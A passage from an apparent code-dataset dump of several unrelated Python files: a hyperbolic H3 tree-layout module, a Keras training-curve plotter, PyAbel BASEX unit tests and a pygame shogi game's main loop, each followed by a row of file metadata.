node_id = current_generation.popleft()
self.nodes[node_id].depth = depth
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
depth += 1
current_generation = next_generation
self.height = depth - 1
def set_subtree_radius(self):
"""
Set the node's hemisphere radius and also its distance from its children. The radius is calculated
recursively from the leaf nodes, with a unit hemisphere size, tracing back to the root. The area
calculation is an approximation from a disc of the bottom of a child hemisphere to a spherical cap.
The recusion requires tracing the tree from the last generation to root so that all the nodes radii
have been calculated before their parent's radius is calcualted. As the hemisphere sizes are tightly
calculated but placing them loosely to the parent hemisphere, the space reservation is 7.2 times of
the actual size of a child hemisphere.
"""
leaf_nodes = self.get_leaf_nodes()
outermost_non_leaf = set()
for n in leaf_nodes:
N = len(self.nodes[self.nodes[n].parent.node_id].children)
self.nodes[n].radius = compute_radius(0.0025)
logging.info("leaf node {0}, parent {1}, radius {2}"
.format(n, self.nodes[n].parent, self.nodes[n].radius))
outermost_non_leaf.add(self.nodes[n].parent.node_id)
depth = self.height - 1
current_generation = deque(list(set(n.node_id for n in outermost_non_leaf
if self.nodes[n].parent is not None
if self.nodes[self.nodes[n].parent.node_id].depth == depth)))
previous_generation = True
while previous_generation:
previous_generation = deque()
while current_generation:
n = current_generation.popleft()
if self.nodes[n].area == 0: # avoid duplicate parents
if self.nodes[n].parent is not None:
previous_generation.append(self.nodes[n].parent.node_id)
for child in self.nodes[n].children:
self.nodes[n].area += 7.2 * compute_hyperbolic_area(self.nodes[child.node_id].radius)
logging.info("node {0}, child {1}, child_area+ {2}, radius {3}, area {4}"
.format(n, child, compute_hyperbolic_area(self.nodes[child.node_id].radius),
self.nodes[child.node_id].radius, self.nodes[child.node_id].area))
self.nodes[n].radius = compute_radius(self.nodes[n].area)
logging.info("---> node {0}, radius {1}, area {2}"
.format(n, self.nodes[n].radius, self.nodes[n].area))
for n in outermost_non_leaf:
if n is not None:
if self.nodes[n].depth == depth:
previous_generation.append(n)
depth -= 1
current_generation = deque(list(set(previous_generation)))
def set_subtree_size(self):
"""
Set the subtree size by the number of nodes in its subtree.
"""
leaf_nodes = self.get_leaf_nodes()
depth = self.height
current_generation = deque(list(n for n in leaf_nodes
if self.nodes[n].depth == depth))
previous_generation = True
while previous_generation:
depth -= 1
previous_generation = deque()
while current_generation:
n = current_generation.popleft()
if self.nodes[n].parent is not None:
previous_generation.append(self.nodes[n].parent.node_id)
self.nodes[self.nodes[n].parent.node_id].tree_size += \
self.nodes[n].tree_size
for n in leaf_nodes:
if self.nodes[n].depth == depth:
previous_generation.append(n)
current_generation = deque(list(set(previous_generation)))
def sort_children_by_radius(self):
"""
Sort the nodes in decreasing order in the same depth by their radii, in place sort is used.
The tree is traversed in a breath-first-search.
"""
depth = 0
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
child_size_pair = [[child, self.nodes[child.node_id].radius]
for child in self.nodes[node_id].children]
child_size_pair.sort(key=itemgetter(1), reverse=True)
if child_size_pair:
self.nodes[node_id].children = list(zip(*child_size_pair)[0])
depth += 1
current_generation = next_generation
def sort_children_by_tree_size(self):
"""
Sort the nodes in decreasing order in the same depth by their number of nodes in subtree,
in place sort is used. This is an alternative option to sort the tree before placing the
nodes on the hemisphere. The original H3 algorithem set leaf node radius as math:: N / alpha
so the nodes with many sibilings can have a larger radius and nodes with a lot of children.
"""
depth = 0
current_generation = deque([self.root])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
for child in self.nodes[node_id].children:
next_generation.append(child)
child_size_pair = [[child, self.nodes[child].tree_size]
for child in self.nodes[node_id].children]
child_size_pair.sort(key=itemgetter(1), reverse=True)
if child_size_pair:
self.nodes[node_id].children = list(zip(*child_size_pair)[0])
depth += 1
current_generation = next_generation
def set_placement(self):
"""
Placing the hemispheres on the root hemisphere. Start from the pole, placing the largest child
hemisphere and then placing smaller hemispheres around the pole. When the hemispheres fully filled
one band, start placing on the next band until fully filled again.
Node:
- Placing the 1st hemisphere and its phi is zero, could lead to a ZeroDivisionError exception
so we set its value as a very small number (0.000001)
- Don't forget to reserve space for the other half of the hemisphere, both the right half and
the lower half. Add theta by delta_theta after placing each node. Add phi by the max
delta_phi in the last band before placing hemispheres to the next band
- Each subtree is independent from each other, so if the new node has a different parent node
than the previous parent node, we know this node is in a different subtree and initialize
phi, theta, dealta_theta and band and placing nodes all over again.
"""
depth = 0
current_generation = deque([n.node_id for n in self.nodes[self.root.node_id].children])
next_generation = True
last_parent = self.root
while next_generation:
next_generation = deque()
phi, theta, delta_theta, band = 0.000001, 0., 0., 1
last_max_phi = 0 # span phi before jumping to the next band
while current_generation:
node = current_generation.popleft()
if self.nodes[node].parent != last_parent: # same gen, diff parent
last_parent = self.nodes[node].parent
phi, theta, delta_theta, band = 0.000001, 0., 0., 1
rp = self.nodes[self.nodes[node].parent.node_id].radius
try:
if phi == 0.000001: # first child of root
phi += compute_delta_phi(self.nodes[node].radius, rp)
self.nodes[node].band = 0
else:
delta_theta = compute_delta_theta(self.nodes[node].radius, rp, phi)
if (theta + delta_theta) <= 2 * math.pi:
theta += delta_theta
if last_max_phi:
last_max_phi = compute_delta_phi(self.nodes[node].radius, rp)
phi += compute_delta_phi(self.nodes[node].radius, rp)
else:
band += 1
theta = delta_theta
phi += last_max_phi + compute_delta_phi(self.nodes[node].radius, rp)
last_max_phi = 0
self.nodes[node].band = band
self.nodes[node].theta = theta
self.nodes[node].phi = phi
except ZeroDivisionError as e:
logging.error("{0}\n node {1}, radius={2}, rp={3}, phi={4}, parent={5}"
.format(e, node, self.nodes[node].radius, rp, phi,
self.nodes[node].parent))
self.nodes[node].coord.sph_to_cart(self.nodes[node].theta,
self.nodes[node].phi,
self.nodes[self.nodes[node].parent.node_id].radius)
if self.nodes[node].parent != self.root.node_id:
self.nodes[node].coord.coordinate_transformation(
self.nodes[self.nodes[node].parent.node_id].theta,
self.nodes[self.nodes[node].parent.node_id].phi)
self.nodes[node].coord.cart_offset(self.nodes[self.nodes[node].parent.node_id].coord)
logging.info("node {0}, radius {1}, band {2}, theta {3}, phi {4}"
.format(node, self.nodes[node].radius, self.nodes[node].band,
self.nodes[node].theta, self.nodes[node].phi))
logging.info("node {0}, x {1}, y {2}, z {3}, w {4}"
.format(node, self.nodes[node].coord.x, self.nodes[node].coord.y,
self.nodes[node].coord.z, self.nodes[node].coord.w))
theta += delta_theta # reserve space for the other half sphere
for child in self.nodes[node].children:
next_generation.append(child.node_id)
depth += 1
current_generation = next_generation
def scatter_plot(self, equators=True, tagging=True, depth_cap=None, node_coloring=None):
"""
Plot the tree with nodes and edges, optionally equators and tagging nodes with node numbers.
The tree is traversed in a breath-first-search.
Note:
- To distinct each generations, a color plate of ["blue", "red", "yellow", "green", "black"]
is used repeatedly.
- The X, Y, Z axises have been labelled.
- When the number of nodes is large and the tree is bushy, it's advised disabling tagging for
better user experience.
:param bool equators: whether to draw the 3D equators, default True
:param bool tagging: whether to tag nodes with node numbers, default True
:param int depth_cap: a filter for rendering the first N generations, default tree height
:param dict node_coloring: an optional map from node_id : color, to color individual nodes
"""
if depth_cap is None:
depth_cap = self.height
fig = plt.figure(figsize=(12, 10))
ax = fig.add_subplot(111, projection="3d")
plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)
xs = [self.nodes[self.root.node_id].coord.x]
ys = [self.nodes[self.root.node_id].coord.y]
zs = [self.nodes[self.root.node_id].coord.z]
plot_color_board = ["blue", "red", "yellow", "green", "black"]
font0 = FontProperties()
font0.set_size(8)
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
n = current_generation.popleft()
if self.nodes[n].depth <= depth_cap:
xs.append(self.nodes[n].coord.x)
ys.append(self.nodes[n].coord.y)
zs.append(self.nodes[n].coord.z)
if tagging:
ax.text(self.nodes[n].coord.x + 0.01,
self.nodes[n].coord.y + 0.01,
self.nodes[n].coord.z + 0.01,
("n{0}".format(n)), fontproperties=font0)
for child in self.nodes[n].children:
next_generation.append(child.node_id)
if self.nodes[n].depth <= depth_cap:
xe = [self.nodes[n].coord.x, self.nodes[child.node_id].coord.x]
ye = [self.nodes[n].coord.y, self.nodes[child.node_id].coord.y]
ze = [self.nodes[n].coord.z, self.nodes[child.node_id].coord.z]
if node_coloring:
ax.plot(xe, ye, ze, node_coloring.get(n, 'black'))
else:
ax.plot(xe, ye, ze, plot_color_board[self.nodes[n].depth % 5])
current_generation = next_generation
ax.scatter(xs, ys, zs, c="r", marker="o")
global_radius = self.nodes[self.root.node_id].radius * 1.12
if equators:
for axis in ["x", "y", "z"]:
circle = Circle((0, 0), global_radius * 1.1)
circle.set_clip_box(ax.bbox)
circle.set_edgecolor("gray")
circle.set_alpha(0.3)
circle.set_facecolor("none") # "none" not None
ax.add_patch(circle)
art3d.pathpatch_2d_to_3d(circle, z=0, zdir=axis)
ax.set_xlim([-1.2 * global_radius, 1.2 * global_radius])
ax.set_ylim([-1.2 * global_radius, 1.2 * global_radius])
ax.set_zlim([-1.2 * global_radius, 1.2 * global_radius])
ax.set_xlabel("X Label")
ax.set_ylabel("Y Label")
ax.set_zlabel("Z Label")
plt.show()
def get_coordinates(self):
"""
Returns a generator of all the coordinates for this plot. This can be used to build SVGs or whatever.
:return: A generator of tuples of (x, y, z) representing the position of each node in 3-d space.
"""
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
yield (self.nodes[node_id].coord.x,
self.nodes[node_id].coord.y,
self.nodes[node_id].coord.z)
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
current_generation = next_generation
| 48.101655 | 120 | 0.57291 | 2,571 | 20,347 | 4.404123 | 0.160638 | 0.092997 | 0.059701 | 0.02517 | 0.481145 | 0.405546 | 0.338691 | 0.299302 | 0.257617 | 0.22759 | 0 | 0.012192 | 0.33892 | 20,347 | 422 | 121 | 48.21564 | 0.829604 | 0.231975 | 0 | 0.393728 | 0 | 0.010453 | 0.028206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041812 | false | 0.003484 | 0.034843 | 0 | 0.087108 | 0.003484 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b31f0b330141ac44d0ebd212cbd8605bcb60314 | 1,530 | py | Python | utils/plot_results.py | miniautonomous/trainer_ai | 953b6c22b65e249a9d7595d15c78c24c12bc254e | [
"MIT"
] | 1 | 2021-06-23T22:32:53.000Z | 2021-06-23T22:32:53.000Z | utils/plot_results.py | miniautonomous/trainer_ai | 953b6c22b65e249a9d7595d15c78c24c12bc254e | [
"MIT"
] | null | null | null | utils/plot_results.py | miniautonomous/trainer_ai | 953b6c22b65e249a9d7595d15c78c24c12bc254e | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
def plot_results(model_name: str, history, history_keys: list, training_dictionary:dict):
"""
Plot the results of a simulation.
Parameters
----------
model_name: (str) model name
history: (tf history) result of a Keras model fit
history_keys: (list) list of losses and metrics related to the triaining fit
training_dictionary: (dict) configuration of training options
"""
# Plot loss
fig = plt.figure(figsize=(20, 10))
ax = plt.subplot(2, 1, 1)
plt.subplots_adjust(hspace=0.6)
ax.plot(history.history[history_keys[0]], color='b', linestyle='-', linewidth=5)
ax.plot(history.history[history_keys[2]], color='r', linestyle='--', linewidth=5)
plt.title('Loss', fontsize=18)
plt.xlabel('epoch', fontsize=16)
plt.ylabel(history_keys[0], fontsize=16)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
plt.legend(['train', 'validation'], loc='best')
# Plot accuracy
ax = plt.subplot(2, 1, 2)
ax.plot(history.history[history_keys[1]], color='b', linestyle='-', linewidth=5)
ax.plot(history.history[history_keys[3]], color='r', linestyle='--', linewidth=5)
plt.title('Accuracy', fontsize=18)
plt.xlabel('epoch', fontsize=16)
plt.ylabel(history_keys[1], fontsize=16)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
plt.legend(['train', 'validation'], loc='best')
if training_dictionary['save_curve']:
fig.savefig(model_name+'_loss_and_accuracy.png')
plt.show()
| 36.428571 | 89 | 0.66732 | 212 | 1,530 | 4.721698 | 0.367925 | 0.125874 | 0.08991 | 0.07992 | 0.533467 | 0.505495 | 0.443556 | 0.377622 | 0.377622 | 0.377622 | 0 | 0.033175 | 0.172549 | 1,530 | 41 | 90 | 37.317073 | 0.757504 | 0.195425 | 0 | 0.32 | 0 | 0 | 0.086076 | 0.018565 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.04 | 0 | 0.08 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b34aa1af56249ef97f4b6fdf0c203875ab7d112 | 1,971 | py | Python | abel/tests/test_basex.py | Derollez/PyAbel | c8be4ed7e8e08ee026634b9e856fb473e58d7330 | [
"MIT"
] | null | null | null | abel/tests/test_basex.py | Derollez/PyAbel | c8be4ed7e8e08ee026634b9e856fb473e58d7330 | [
"MIT"
] | null | null | null | abel/tests/test_basex.py | Derollez/PyAbel | c8be4ed7e8e08ee026634b9e856fb473e58d7330 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import numpy as np
from numpy.testing import assert_allclose
import abel
DATA_DIR = os.path.join(os.path.split(__file__)[0], 'data')
def test_basex_basis_sets_cache():
# n_vert, n_horz = 121,121
# nbf_vert, nbf_horz = 121, 61
n = 121
file_name = os.path.join(DATA_DIR, "basex_basis_{}_{}_{}_{}.npy".format(n, n, n, n//2+1))
if os.path.exists(file_name):
os.remove(file_name)
# 1st call generate and save
abel.basex.get_bs_basex_cached(n,n, basis_dir=DATA_DIR, verbose=False)
# 2nd call load from file
abel.basex.get_bs_basex_cached(n,n, basis_dir=DATA_DIR, verbose=False)
if os.path.exists(file_name):
os.remove(file_name)
def test_basex_shape():
n = 21
x = np.ones((n, n), dtype='float32')
bs = abel.basex.get_bs_basex_cached(n,n, basis_dir=None, verbose=False)
recon = abel.basex.basex_core_transform(x, *bs)
assert recon.shape == (n, n)
def test_basex_zeros():
n = 21
x = np.zeros((n, n), dtype='float32')
bs = abel.basex.get_bs_basex_cached(n,n, basis_dir=None, verbose=False)
recon = abel.basex.basex_core_transform(x, *bs)
assert_allclose(recon, 0)
def test_basex_step_ratio():
"""Check a gaussian solution for BASEX"""
n = 51
r_max = 25
ref = abel.tools.analytical.GaussianAnalytical(n, r_max, symmetric=True, sigma=10)
tr = np.tile(ref.abel[None, :], (n, 1)) # make a 2D array from 1D
bs = abel.basex.get_bs_basex_cached(n,n, basis_dir=None, verbose=False)
recon = abel.basex.basex_core_transform(tr, *bs)
recon1d = recon[n//2 + n%2]
ratio = abel.benchmark.absolute_ratio_benchmark(ref, recon1d)
assert_allclose( ratio , 1.0, rtol=3e-2, atol=0)
if __name__ == '__main__':
test_basex_basis_sets_cache()
test_basex_shape()
test_basex_zeros()
test_basex_step_ratio()
| 27.760563 | 93 | 0.690005 | 320 | 1,971 | 3.940625 | 0.3 | 0.017446 | 0.047581 | 0.055512 | 0.421094 | 0.384615 | 0.384615 | 0.384615 | 0.384615 | 0.384615 | 0 | 0.028554 | 0.182648 | 1,971 | 70 | 94 | 28.157143 | 0.75419 | 0.083714 | 0 | 0.295455 | 0 | 0 | 0.02951 | 0.015033 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | false | 0 | 0.159091 | 0 | 0.25 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b3a8027dd21491237d65a61527430d014ff49a1 | 23,554 | py | Python | shogi-main1.py | GudSirSnek/GameOfShogi | 3961cdcba68561de9eb98d96dcc50df498cc9fcc | [
"Apache-2.0"
] | null | null | null | shogi-main1.py | GudSirSnek/GameOfShogi | 3961cdcba68561de9eb98d96dcc50df498cc9fcc | [
"Apache-2.0"
] | null | null | null | shogi-main1.py | GudSirSnek/GameOfShogi | 3961cdcba68561de9eb98d96dcc50df498cc9fcc | [
"Apache-2.0"
] | null | null | null | #main class handles user input and current gameState class
import pygame as p
import shogiEngine1
import os
import copy
import Piece
import Menu
height = 1057 #defines the board resolution
width = 1920
sq_size = 66
x_offset = 459
y_offset = 243
scale = 1
p.font.init()
myfont = p.font.SysFont('Comic Sans MS', 28//scale)
myfont1 = p.font.SysFont('Comic Sans MS', 10//scale)
HEIGHT = height//scale
WIDTH = width//scale
SQ_size = sq_size//scale #defines the size of each square
xoffset = x_offset//scale
yoffset = y_offset//scale
MAX_FPS = 15
IMAGES = {}
IMAGES_TAKEN = {}
background = p.transform.scale(p.image.load("images/wood-square.png") , (706//scale, 706//scale))
colors = [p.color.Color("white"), p.color.Color("gray"), p.color.Color("black"), p.color.Color("green"), p.color.Color("purple")]
def load_Images(SQ_size, type):
pieces = ["BL", "BN", "BS", "BG", "BK", "BB", "BR", "BP", "WL", "WN", "WS", "WG", "WK", "WB","WR", "WP"]
if type == 1:
for piece in pieces:
IMAGES[piece] = p.transform.scale(p.image.load("images/" + piece + ".png") , (SQ_size, SQ_size))
IMAGES_TAKEN[piece] = p.transform.scale(p.image.load("images/" + piece + ".png") , (66//scale, 66//scale))
else:
for piece in pieces:
IMAGES[piece] = p.transform.scale(p.image.load("images/JAP/" + piece + ".png") , (SQ_size, SQ_size))
IMAGES_TAKEN[piece] = p.transform.scale(p.image.load("images/JAP/" + piece + ".png") , (66//scale, 66//scale))
def drawGameState(screen, gs, playerClicks, Wmoves, Bmoves, GO, MH, color, SQ_size): #graphics for current gamestate
screen.fill(colors[0]) #reset screen to white
drawBoard(screen, gs, playerClicks, Wmoves, Bmoves, MH, color, SQ_size) #draw squares on drawBoard
drawPieces(screen, gs, SQ_size) #draw pieces on top of squares
drawMoveHistory(screen, gs.moveLog) #draw move history
drawTaken(screen, gs.Wcapture, gs.Bcapture) #draw taken pieces
drawTimer(screen, gs) #draw player times
if GO[2]: #Checks for game over
drawWin(screen, GO)
if gs.Wtimer <= 0:
drawWin(screen, [False, True, True])
elif gs.Btimer <= 0:
drawWin(screen, [True, False, True])
def drawBoard(screen, gs, playerClicks, Wmoves, Bmoves, MH, color, SQ_size): #draw squares, later on: implement custom colors
screen.blit(background, p.rect.Rect(403//scale, 187//scale, 706//scale, 706//scale))#draws backdrop of board
k = [-1, -1]
for r in range(gs.dimensionsx): #this inbedded loop loops over all squares in the board and generates them on the screen
for c in range(gs.dimensionsy):
colo = color[((r+c)%2)] #this line dictates the color of the square currently iterating
p.draw.rect(screen, colo, p.rect.Rect(c*SQ_size+xoffset, r*SQ_size+yoffset, SQ_size, SQ_size))
if len(playerClicks) == 1 and MH: #this portion is used when a piece has been selected to move but hasnt been moved yoffset
#this portion is to highlight all possible moves of that piece
moveset = []
if gs.whiteToMove: #checks whos turn it is
for i in Wmoves: #iterates over the White possible moves to find the selected piece's moveset
if i[2][0] == playerClicks[0][0] and i[2][1] == playerClicks[0][1]:
k = [i[2][0], i[2][1]]
moveset = i[3]
break
else: #same as lines 65-70 but for the Black player
for i in Bmoves:
if i[2][0] == playerClicks[0][0] and i[2][1] == playerClicks[0][1]:
k = [i[2][0], i[2][1]]
moveset = i[3]
break
for i in moveset: #iterates over the selected piece's possible moves and highlight the squares in green
p.draw.rect(screen, colors[4], p.rect.Rect(i[1]*SQ_size+xoffset, i[0]*SQ_size+yoffset, SQ_size, SQ_size))
def drawPieces(screen, gs, SQ_size): #draw pieces on board using current gameState
for r in range(gs.dimensionsx):
for c in range(gs.dimensionsy): #nested loop used to iterate over all squares in the board
piece = gs.board[r][c]
if piece != "--": #not empty square
if piece.Color != "Null": #not an empty square
screen.blit(IMAGES[piece.Color[0] + piece.Name[0]], p.rect.Rect(piece.Position[1]*SQ_size+xoffset, piece.Position[0]*SQ_size+yoffset, SQ_size, SQ_size))
def drawPromotion(screen):
p.draw.rect(screen, colors[1], p.rect.Rect(1000//scale, 1000//scale, 156//scale, 48//scale))
yes = myfont.render("yes", True, (255, 255, 255))
screen.blit(yes, (1000//scale, 1000//scale))
p.draw.rect(screen, colors[1], p.rect.Rect(1000//scale + 156//scale, 1000//scale, 156//scale, 48//scale))
no = myfont.render("no", True, (255, 255, 255))
screen.blit(no, (1000//scale + 156//scale, 1000//scale))
def drawMoveHistory(screen, moveLog):
p.draw.rect(screen, colors[2], p.rect.Rect(1506//scale, 82//scale, 156//scale, 48//scale)) #draws box which move history will appear in
undo = myfont.render("UNDO", True, (255, 255, 255)) #draws undo and redo tabs
screen.blit(undo, (1506//scale, 82//scale))
xsize = (390//3 - 2)//scale
ysize = (862//25 -1)//scale
for i in range(0, 25): #generates individual cells which each move will appear in
p.draw.rect(screen, colors[2], p.rect.Rect(1507//scale + 1, (148//scale)+(i*(ysize + 1)), xsize, ysize), 1)
if len(moveLog) >= 25: #sees if the length of the movelog is above limits
r = 25
M = moveLog[-25:] #here, M only contains the 25 most recent moves
else:
r = len(moveLog)
M = moveLog.copy()
M.reverse()
for i in range(r): #iterates over M and prints each move
m = M[i]
text1 = myfont.render(m.getShogiNotation(), True, (0, 0, 0))
text2 = myfont.render("---->", True, (0, 0, 0))
screen.blit(text1,(1517//scale + 1,(140//scale)+(i*(ysize + 1))))
def drawTaken(screen, Wcapture, Bcapture):
p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 46//scale, 462//scale, 66//scale), 2)#draws rectangle that will hold White piece graphics
p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 112//scale, 462//scale, 66//scale), 2) #drawes rectangle that will hold number of each piece captured
p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 900//scale, 462//scale, 66//scale), 2) #same as 134 but for white player
p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 966//scale, 462//scale, 66//scale), 2) #same as 135 but for white player
pieces = ["BL", "BN", "BS", "BG", "BB", "BR", "BP", "WL", "WN", "WS", "WG", "WB","WR", "WP"]
for i in range(7):
screen.blit(IMAGES_TAKEN[pieces[i]], p.rect.Rect((403+66*i)//scale, 112//scale, 66//scale, 66//scale))
screen.blit(IMAGES_TAKEN[pieces[i+7]], p.rect.Rect((403+66*i)//scale, 900//scale, 66//scale, 66//scale))
Wcount = [0, 0, 0, 0, 0, 0, 0]
Bcount = [0, 0, 0, 0, 0, 0, 0]
for i in Wcapture:
if i.Name == "Lance":
Wcount[0] = Wcount[0] + 1
elif i.Name == "Night":
Wcount[1] = Wcount[1] + 1
elif i.Name == "Silver General":
Wcount[2] = Wcount[2] + 1
elif i.Name == "Gold General":
Wcount[3] = Wcount[3] + 1
elif i.Name == "Bishop":
Wcount[4] = Wcount[4] + 1
elif i.Name == "Rook":
Wcount[5] = Wcount[5] + 1
elif i.Name == "Pawn":
Wcount[6] = Wcount[6] + 1
for i in Bcapture:
if i.Name == "Lance":
Bcount[0] = Bcount[0] + 1
elif i.Name == "Night":
Bcount[1] = Bcount[1] + 1
elif i.Name == "Silver General":
Bcount[2] = Bcount[2] + 1
elif i.Name == "Gold General":
Bcount[3] = Bcount[3] + 1
elif i.Name == "Bishop":
Bcount[4] = Bcount[4] + 1
elif i.Name == "Rook":
Bcount[5] = Bcount[5] + 1
elif i.Name == "Pawn":
Bcount[6] = Bcount[6] + 1
for i in range(len(Wcount)):
text1 = myfont.render(str(Wcount[i]), True, (0, 0, 0))
screen.blit(text1,((403+66*i)//scale,966//scale))
for i in range(len(Bcount)):
text1 = myfont.render(str(Bcount[i]), True, (0, 0, 0))
screen.blit(text1,((403+66*i)//scale,46//scale))
def drawMove(screen, moveset, SQ_size):
for i in moveset:
p.draw.rect(screen, colors[3], p.rect.Rect(i[1]*SQ_size+xoffset, i[0]*SQ_size+yoffset, SQ_size, SQ_size))
def drawWin(screen, GO):
if not GO[0] and GO[1]:
GameOVerText = myfont.render("Game Over, Black Wins", True, (0, 0, 0))
p.draw.rect(screen, colors[2], p.rect.Rect(10//scale, 10//scale, 350//scale, 66//scale), 2)
screen.blit(GameOVerText, (20//scale, 10//scale))
elif GO[0] and not GO[1]:
GameOVerText = myfont.render("Game Over, White Wins", True, (0, 0, 0))
p.draw.rect(screen, colors[2], p.rect.Rect(10//scale, 10//scale, 350//scale, 66//scale), 2)
screen.blit(GameOVerText, (20//scale, 10//scale))
ret = myfont.render("press backspace to return to menu or press esc to quit", True, (0, 0, 0))
screen.blit(ret, (500//scale, 10//scale))
def drawTimer(screen, gs):
p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 900//scale, 170//scale, 66//scale), 2)
p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 966//scale, 170//scale, 66//scale), 2)
p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 46//scale, 170//scale, 66//scale), 2)
p.draw.rect(screen, colors[2], p.rect.Rect(938//scale, 112//scale, 170//scale, 66//scale), 2)
Wtext = myfont.render("White Time", True, (0, 0, 0))
Btext = myfont.render("Black Time", True, (0, 0, 0))
screen.blit(Wtext, (938//scale, 906//scale))
screen.blit(Btext, (938//scale, 60//scale))
Wtime = myfont.render(str(round(gs.Wtimer, 3)), True, (0, 0, 0))
screen.blit(Wtime, (938//scale, 974//scale))
Btime = myfont.render(str(round(gs.Btimer, 3)), True, (0, 0, 0))
screen.blit(Btime, (938//scale, 120//scale))
def setup():
dimension = int(input("Enter dimension: "))
timer = int(input("Enter times: "))
WTM= bool(input("white first?"))
return [dimension, timer, WTM]
def gameOver(gs, Bmoves, Wmoves):
gameover = False
WCM = True
BCM = True
g = copy.deepcopy(gs)
Bmoves1 = g.getMoves("Black")
C = g.checkCheck("White", Bmoves1)
if len(C) > 0:
Wmoves = gs.getMoves("White")
Bmoves = gs.getMoves("Black")
WCM = gs.checkMate(copy.deepcopy(Wmoves), copy.deepcopy(Bmoves), C, "White", "Black")
if not WCM:
gameover = True
g = copy.deepcopy(gs)
Wmoves1 = g.getMoves("White")
C = g.checkCheck("Black", Wmoves1)
if len(C) > 0:
Wmoves = gs.getMoves("White")
Bmoves = gs.getMoves("Black")
BCM = gs.checkMate(copy.deepcopy(Bmoves), copy.deepcopy(Wmoves), C, "Black", "White")
if not BCM:
gameover = True
return [WCM, BCM, gameover]
def main():
#S = setup()
S = Menu.main()
if S == False:
running = False
else:
#os.environ['SDL_VIDEO_CENTERED'] = '1'
screen = p.display.set_mode((WIDTH, HEIGHT), p.FULLSCREEN)
clock = p.time.Clock()
screen.fill(p.color.Color("white"))
MH = S[4]
COLOR = [S[1], S[0]]
SQ_size = (594//int(S[2][0]))//scale
gs = shogiEngine1.GameState(S[2], True, S[5])
start_ticks=p.time.get_ticks() #starter tick
load_Images(SQ_size, S[3])
running = True
sqSelected = () #No square selected, keep track of last click of the user (tuple)
playerClicks = [] #keep track of player clicks (2 tuples: [(6,4)])
Wchecks = []
Bchecks = []
GO = [True, True, False]
Wmoves = gs.getMoves("White")
Bmoves = gs.getMoves("Black")
Dfound= False
quit = False
movestack = []
while running:
if gs.whiteToMove and not GO[2] and gs.timer != False:
gs.Wtimer = gs.Wtimer -1/15
elif not gs.whiteToMove and not GO[2] and gs.timer != False:
gs.Btimer = gs.Btimer -1/15
if GO[2] or gs.Wtimer <= 0 or gs.Btimer <= 0:
running = False
for e in p.event.get():
if e.type == p.QUIT:
running = False
quit = True
elif e.type == p.KEYDOWN:
if e.key == p.K_ESCAPE:
running = False
quit = True
elif e.type == p.MOUSEBUTTONDOWN:
location = p.mouse.get_pos() #x,y location of mouse
col = (location[0] -xoffset)//SQ_size
row = (location[1] - yoffset)//SQ_size
if location[1] >= 900//scale and location[1] <= 966//scale and gs.whiteToMove or location[1] >= 112//scale and location[1] <= 178//scale and not gs.whiteToMove:
T= (location[0]-(403//scale))//(66//scale)
switch = {
0: "Lance",
1: "Night",
2: "Silver General",
3: "Gold General",
4: "Bishop",
5: "Rook",
6: "Pawn"
}
if gs.whiteToMove:
for i in gs.Wcapture:
if i.Name == switch.get(T):
F = i
Dfound = True
elif not gs.whiteToMove:
for i in gs.Bcapture:
if i.Name == switch.get(T):
F = i
Dfound = True
if gs.isInBoard(row, col):
if sqSelected == (row, col): #check if the user clicks the same square
sqSelected = () #deselect
playerClicks = [] #clear player clicks
elif gs.board[row][col].Name == "Null" and len(sqSelected) == 0 and not Dfound:
sqSelected = () #deselect
playerClicks = [] #clear player clicks
elif gs.board[row][col].Color == "Black" and gs.whiteToMove == True and len(sqSelected)<1 or gs.board[row][col].Color == "White" and gs.whiteToMove == False and len(sqSelected)<1:
sqSelected = () #deselect
playerClicks = [] #clear player clicks
else:
sqSelected = (row, col)
playerClicks.append(sqSelected) #append for both 1st and 2nd clicks
if len(playerClicks) == 2:
move = shogiEngine1.Move(playerClicks[0], playerClicks[1], copy.deepcopy(gs.board), copy.deepcopy(gs.whiteToMove), Wmoves, Bmoves, copy.deepcopy(gs.Wcapture), copy.deepcopy(gs.Bcapture), copy.deepcopy(gs.Wtimer), copy.deepcopy(gs.Btimer))
